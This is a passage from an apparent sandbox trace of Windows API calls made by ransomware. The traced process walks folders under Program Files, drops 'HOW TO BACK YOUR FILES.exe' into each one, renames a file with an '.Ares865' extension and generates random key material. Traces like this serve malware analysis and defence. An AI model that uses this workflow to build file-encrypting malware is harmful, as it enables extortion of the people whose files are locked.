FILES.exe") returned -1 [0074.543] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.544] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB" [0074.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB") returned 53 [0074.544] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB" [0074.544] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.544] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.547] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.547] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5def1d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5def1d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.548] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.548] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.548] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10" [0074.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0074.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned 56 [0074.548] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10" [0074.548] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.548] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.561] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5df17e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df17e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.562] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.562] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.562] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources" [0074.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0074.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned 66 [0074.563] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources" [0074.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.564] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.568] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5df3dfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df3dfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.568] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.568] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" [0074.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0074.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned 71 [0074.568] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" [0074.568] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.568] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.573] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5df3dfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df3dfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.573] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.573] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.574] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" [0074.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0074.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 67 [0074.574] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" [0074.574] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.574] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.581] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5df64120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df64120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.581] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Program Files\\Internet Explorer") returned="C:\\Program Files\\Internet Explorer" [0074.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee970 | out: hHeap=0x2b0000) returned 1 [0074.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0074.581] lstrlenW (lpString="C:\\Program Files\\Internet Explorer") returned 34 [0074.581] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Internet Explorer" | out: lpString1="C:\\Program Files\\Internet Explorer") returned="C:\\Program Files\\Internet Explorer" [0074.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.585] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.585] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5df64120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df64120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.585] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.585] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.586] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Internet Explorer\\SIGNUP", iMaxLength=260 | out: lpString1="C:\\Program Files\\Internet Explorer\\SIGNUP") returned="C:\\Program Files\\Internet Explorer\\SIGNUP" [0074.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0074.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.586] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP") returned 41 [0074.586] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Internet Explorer\\SIGNUP" | out: lpString1="C:\\Program Files\\Internet Explorer\\SIGNUP") returned="C:\\Program Files\\Internet Explorer\\SIGNUP" [0074.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.586] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\internet explorer\\signup\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.589] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.589] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5df64120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df64120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.590] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.590] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.590] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Internet Explorer\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Internet Explorer\\en-US") returned="C:\\Program Files\\Internet Explorer\\en-US" [0074.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0074.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0074.590] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\en-US") returned 40 [0074.590] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Internet Explorer\\en-US" | out: lpString1="C:\\Program Files\\Internet Explorer\\en-US") returned="C:\\Program Files\\Internet Explorer\\en-US" [0074.590] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.590] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Internet Explorer\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\internet explorer\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.594] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.594] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5df64120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df64120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.595] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker") returned="C:\\Program Files\\DVD Maker" [0074.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccda8 | out: hHeap=0x2b0000) returned 1 [0074.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0074.595] lstrlenW (lpString="C:\\Program Files\\DVD Maker") returned 26 [0074.595] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker" | out: lpString1="C:\\Program Files\\DVD Maker") returned="C:\\Program Files\\DVD Maker" [0074.595] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.595] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.598] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.598] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5df8a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df8a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.599] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.599] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.599] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared") returned="C:\\Program Files\\DVD Maker\\Shared" [0074.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee7e0 | out: hHeap=0x2b0000) returned 1 [0074.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0074.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared") returned 33 [0074.599] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared") returned="C:\\Program Files\\DVD Maker\\Shared" [0074.599] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.599] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.605] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.605] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5df8a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5df8a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.605] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.605] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.606] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.Ares865") returned 53 [0074.606] MoveFileExW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.Ares865" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml.ares865"), dwFlags=0x1) returned 1 [0074.608] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.Ares865" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0074.608] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=14239) returned 1 [0074.608] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.609] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.609] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.613] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.614] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.614] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.614] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles" [0074.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0074.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0074.614] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 43 [0074.614] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles" [0074.614] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.614] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.621] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.621] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5dfb03e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dfb03e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.622] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.622] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.626] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" [0074.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3328 | out: hHeap=0x2b0000) returned 1 [0074.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0074.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 52 [0074.626] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned="C:\\Program 